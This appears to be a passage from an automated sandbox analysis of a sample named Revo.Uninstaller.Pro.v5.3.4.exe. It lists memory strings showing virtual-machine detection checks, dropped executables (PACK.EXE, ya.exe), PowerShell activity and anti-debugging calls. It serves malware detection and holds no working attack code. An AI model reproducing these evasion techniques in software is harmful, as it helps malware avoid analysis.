        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.44242424C-D130-4AD7-BDF1-DE7171B2AB906.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.13B44170A-1377-48FC-B6B3-368C307523586.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Workstation PlayerVMware, Inc.16.0B2A67D4A-5BEC-EA52-874C-74EC4CB5270D6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1542DE07B-58FA-448D-A03B-839409DD9E3C6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{B62BB102-57D8-420A-9403-494D81F09EA6}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {5E16122B-D844-47B7-BB31-DA054680E671}VMware PlayerMsiExec.exe /X{5E16122B-D844-47B7-BB31-DA054680E671}16.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.263B8748E-B8AE-4543-AF90-90AC1FDAE65110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161525000.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844422386.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844422386.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159626319.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161525000.00000000009C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1B62B86D5-1F75-E130-728D-C2389C19C4216.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {17C3235A-A4B9-44ED-8794-54D8408F9733}VMware Fusion PC Migration AgentMsiExec.exe /I{17C3235A-A4B9-44ED-8794-54D8408F9733}5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.45B1FE2E8-3EAA-4084-AB49-86C371FD57F010.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Error in RunsOnVirtualMachineU
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}VMware PlayerMsiExec.exe /X{B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1B4ED644D-9E22-4DCF-8EC5-0842C70E179F10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Call: RunsOnVirtualMachine
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0832A0C4E-0513-4EB8-BC57-FC06C3E4A3AD6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.227542D48-5663-4A91-9043-4324A8A21FFD6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.113C921E7-8314-4819-948E-2F9F8B0951BB10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.13B6B1C7F-7E70-4965-85B0-609252867B2B6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.263B8748E-B8AE-4543-AF90-90AC1FDAE65110.0{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Workstation PlayerVMware, Inc.14.0689E1E35-CD38-45EF-BFC1-A207A94A6E356.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2E2123DBC-3DC3-4947-9037-24EC1B18C9CE10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A2AFD234-28B3-4674-A5D0-0B0F6506EE226.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Fusion PC Migration AgentVMware, Inc.5.1C9EDBF7C-FAE6-5B7D-2D8E-F409BAB3C59A6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.1B0C15D57-1F93-4986-808F-710FFB0686A96.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Workstation PlayerVMware, Inc.16.064C6F385-E0E0-B5AE-819C-253D7C606A4210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files (x86)\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files (x86)\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWare detected
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Workstation PlayerVMware, Inc.14.0E5D4C4C9-3710-4149-AA8D-BB54149B73B46.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.102C9828F-B700-A8CA-EA5C-C07D973B2D8910.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Horizon View ClientVMware, Inc.5.4EC80F048-95D4-4F72-B498-C2CF528E52036.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard5.1367FB481-70A4-2BD9-D89F-D204ADA9525A6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ACB5A703-699E-4EC4-8293-F79DB759E87E6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.15546167B-7BB3-4E63-9071-5AE0E2FEC1E66.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: ya.exe, 0000001B.00000003.2029215265.00000000005F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1930AC8C3-2482-4219-AAB4-6EC8F4F28D586.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RunsOnVirtualMachine
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxService.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.05960DB4E-29FC-438D-8C4A-D210BB57687110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1452FEA7E-D933-41A7-9E0A-BFFEB327C2F410.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1555EAE6D-8547-4704-B511-DE16BE0A88CF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files (x86)\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E0F86B18-CDF6-4CD1-BC30-47D14A43766F10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ADE47139-1A57-4F07-B628-BF198A9B846210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAPI call chain: ExitProcess graph end nodegraph_0-3986
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEAPI call chain: ExitProcess graph end nodegraph_16-23704
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeAPI call chain: ExitProcess graph end nodegraph_27-3638
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_002FE4F5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00306AF3 mov eax, dword ptr fs:[00000030h]16_2_00306AF3
